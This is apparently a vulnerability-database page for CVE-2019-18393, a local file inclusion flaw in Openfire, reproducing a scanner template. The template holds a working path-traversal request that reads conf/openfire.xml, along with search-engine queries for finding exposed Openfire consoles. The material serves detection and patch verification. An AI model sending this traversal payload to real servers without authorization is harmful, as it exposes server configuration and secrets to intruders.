CVE-2019-18393: Ignite Realtime Openfire <4.42 - Local File Inclusion

2025-08-01 Ignite Realtime Openfire PoC Public

Description

Ignite Realtime Openfire through 4.4.2 is vulnerable to local file inclusion via PluginServlet.java. It does not ensure that retrieved files are located under the Openfire home directory.

PoC

id: CVE-2019-18393

info:
  name: Ignite Realtime Openfire <4.42 - Local File Inclusion
  author: pikpikcu
  severity: medium
  description: Ignite Realtime Openfire through 4.4.2 is vulnerable to local file inclusion via PluginServlet.java. It does not ensure that retrieved files are located under the Openfire home directory.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, and potential compromise of the affected system.
  remediation: |
    Upgrade Ignite Realtime Openfire to version 4.42 or later to mitigate this vulnerability.
  reference:
    - https://github.com/igniterealtime/Openfire/pull/1498
    - https://swarm.ptsecurity.com/openfire-admin-console/
    - https://nvd.nist.gov/vuln/detail/CVE-2019-18393
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/Elsfa7-110/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2019-18393
    cwe-id: CWE-22
    epss-score: 0.13945
    epss-percentile: 0.96349
    cpe: cpe:2.3:a:igniterealtime:openfire:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: igniterealtime
    product: openfire
    shodan-query:
      - http.title:"openfire admin console"
      - http.title:"openfire"
    fofa-query:
      - title="openfire"
      - title="openfire admin console"
    google-query:
      - intitle:"openfire"
      - intitle:"openfire admin console"
  tags: cve,cve2019,openfire,lfi,igniterealtime,vkev,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/plugins/search/..\..\..\conf\openfire.xml'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "org.jivesoftware.database.EmbeddedConnectionProvider"
          - "Most properties are stored in the Openfire database"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100a8707113791c85b7187b28c388aae2d77426d0cf042885e4024c77e6e9e6dd4002207b0912890b6315492a4e7b8926aa77bfa115e9e2ae81e1577a3d9c8e566a01aa:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities